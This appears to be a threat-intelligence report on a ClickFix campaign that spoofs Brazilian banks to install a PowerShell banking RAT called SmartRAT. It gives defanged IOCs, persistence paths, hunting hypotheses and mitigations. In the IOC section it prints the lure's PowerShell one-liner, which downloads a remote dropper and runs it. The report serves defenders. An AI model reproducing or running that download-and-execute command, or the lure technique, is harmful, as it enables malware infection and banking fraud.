AI Generated ClickFix Attack Delivers SmartRAT | ThreatLabz
ThreatLabz identified a ClickFix campaign utilizing AI-generated typosquatting domains to impersonate Brazilian banks and deliver a PowerShell-based banking RAT dubbed SmartRAT. The malware establishes persistence via scheduled tasks or Windows services, communicates over a custom TCP protocol on port 51888, and features advanced capabilities including keylogging, fake banking overlays, and QR code interception for financial fraud.
- domaincartaobb[.]comTyposquatting domain impersonating a Brazilian bank used to host the ClickFix lure.
- domainc[.]windowsupdate-cdn[.]comPrimary Command and Control (C2) domain for SmartRAT.
- ip162[.]141[.]111[.]227Fallback Command and Control (C2) IP address for SmartRAT.
- ip64[.]95[.]13[.]238Payload delivery IP hosting the initial st.txt dropper and secondary payload.php.
- urlhxxp://64[.]95[.]13[.]238/payload[.]phpURL hosting the secondary encrypted SmartRAT payload.
- urlhxxp://64[.]95[.]13[.]238/st[.]txtURL hosting the initial PowerShell dropper script.
Detection / HunterGoogle
What Happened
Cybercriminals are using AI tools to create fake websites that look like popular Brazilian banks. These sites use a trick called 'ClickFix'—showing a fake security check and then a fake error screen—to convince visitors to copy and paste a malicious command into their computer. If executed, this command installs a hidden program called SmartRAT, which allows the attackers to steal passwords, monitor the screen, and intercept banking QR codes. Users should be extremely cautious about copying and pasting commands from websites, and organizations should ensure their security tools can detect unusual PowerShell activity.
Key Takeaways
- Threat actors are using AI-generated websites to impersonate Brazilian banks and deploy a ClickFix lure.
- The ClickFix lure tricks victims into executing a PowerShell command that downloads SmartRAT.
- SmartRAT is a PowerShell-based banking RAT capable of remote access, keylogging, fake banking overlays, and QR code interception.
- SmartRAT establishes persistence via scheduled tasks, registry keys, or a Windows service named MicrosoftEdgeUpdateCore.
- The C2 panel for SmartRAT contains a critical authentication flaw allowing bypass via client-side localStorage manipulation.
Affected Systems
- Windows operating systems
- Users of Brazilian financial institutions
Attack Chain
The attack begins when a victim visits a typosquatted domain impersonating a Brazilian bank. A fake CAPTCHA and subsequent fake BSOD trick the user into copying and executing a malicious PowerShell command via the Run dialog. This command downloads a dropper script (st.txt) which in turn fetches and decrypts the main SmartRAT payload (payload.php). SmartRAT establishes persistence via a scheduled task, registry key, or Windows service, and begins communicating with its C2 server to enable remote control, keylogging, and banking overlays.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article does not provide specific detection rules, but details behavioral indicators and IOCs that can be used to build custom detections.
Detection Engineering Assessment
EDR Visibility: High — EDR solutions with PowerShell script block logging, process creation monitoring (especially csc.exe spawned by PowerShell), and network connection tracking can easily detect the execution chain and C2 communications. Network Visibility: Medium — While C2 traffic is encrypted over a raw TCP socket on port 51888, the initial payload downloads are over HTTP, and the non-standard port usage for C2 can be flagged. Detection Difficulty: Moderate — The use of ClickFix relies on user interaction, bypassing some automated email/web filters. However, the heavy reliance on PowerShell, inline C# compilation, and specific file paths makes post-execution detection straightforward with proper logging.
Required Log Sources
- PowerShell Script Block Logging (Event ID 4104)
- Process Creation (Event ID 4688 / Sysmon Event ID 1)
- Network Connections (Sysmon Event ID 3)
- Scheduled Task Creation (Event ID 4698)
- Service Creation (Event ID 7045)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for PowerShell processes executing hidden windows and downloading files to public or temporary directories. | Process Creation, PowerShell Script Block Logging | Execution | Low |
| Search for the creation of scheduled tasks or Windows services named 'MicrosoftEdgeUpdateCore', especially if the binary path points to the ETW diagnostic folder. | Scheduled Task Creation, Service Creation | Persistence | Low |
| Monitor for PowerShell processes spawning csc.exe to compile inline C# code, which is highly anomalous for standard user activity. | Process Creation | Privilege Escalation | Low |
| Investigate outbound network connections over TCP port 51888, particularly from PowerShell processes. | Network Connections | Command and Control | Low |
Control Gaps
- Lack of PowerShell execution restrictions for standard users
- Insufficient web filtering for newly registered typosquatting domains
- Missing endpoint controls to prevent users from executing commands from the clipboard
Key Behavioral Indicators
- PowerShell execution with hidden window flags (ShowWindow)
- Creation of files in %APPDATA%\Microsoft\Diagnosis\ETW\
- Network connections to port 51888
- Inline C# compilation via csc.exe spawned by PowerShell
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- Consider blocking the identified C2 IPs and domains at the network perimeter.
- Evaluate whether to search endpoint telemetry for the presence of 'MicrosoftEdgeUpdateCore' scheduled tasks or services.
Infrastructure Hardening
- Consider restricting PowerShell execution policies and enabling Constrained Language Mode where feasible.
- Evaluate implementing network segmentation to restrict outbound traffic on non-standard ports like 51888.
- If supported by your tooling, consider blocking access to known AI-generated typosquatting domains.
User Protection
- Consider deploying EDR rules to detect and block PowerShell processes spawning csc.exe.
- Evaluate whether to enforce UAC prompts for all users and monitor for anomalous elevation requests.
Security Awareness
- Consider updating security awareness training to educate users on the 'ClickFix' technique, emphasizing the dangers of copying and pasting commands from web pages.
- Evaluate whether to train users to recognize fake CAPTCHA and BSOD screens.
MITRE ATT&CK Mapping
- T1566 - Phishing
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- T1569.002 - Service Execution
- T1543.003 - Create or Modify System Process: Windows Service
- T1036 - Masquerading
- T1070.004 - Indicator Removal: File Deletion
- T1082 - System Information Discovery
- T1071 - Application Layer Protocol
Additional IOCs
- Registry Keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpdateCore- Registry run key used by SmartRAT for persistence.
- File Paths:
C:\Users\Public\Documents\msedge.txt- Decoy text file used to store the downloaded payload.php.%APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt- File path where SmartRAT copies itself for persistence.%APPDATA%\Microsoft\Diagnosis\ETW\client_debug.log- Debug log file created by SmartRAT.C:\ProgramData\Microsoft\Diagnosis\ETW\process_<PID>.log- Per-process log file created by SmartRAT to record activity.%ProgramData%\Microsoft\Diagnosis\ETW\MicrosoftEdgeUpdateCore.exe- Compiled C# Windows service executable used by SmartRAT for privilege escalation and persistence.
- Command Lines:
- Purpose: Initial ClickFix execution to download and run the dropper | Tools:
powershell.exe| Stage: Initial Access |powershell "$k8='http://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" - Purpose: Hide console window and download secondary payload | Tools:
powershell.exe| Stage: Execution |[DllImport("user32.dll")]public static extern bool ShowWindow - Purpose: Compile inline C# code to install a Windows service | Tools:
csc.exe,powershell.exe| Stage: Privilege Escalation |csc.exe
- Purpose: Initial ClickFix execution to download and run the dropper | Tools:
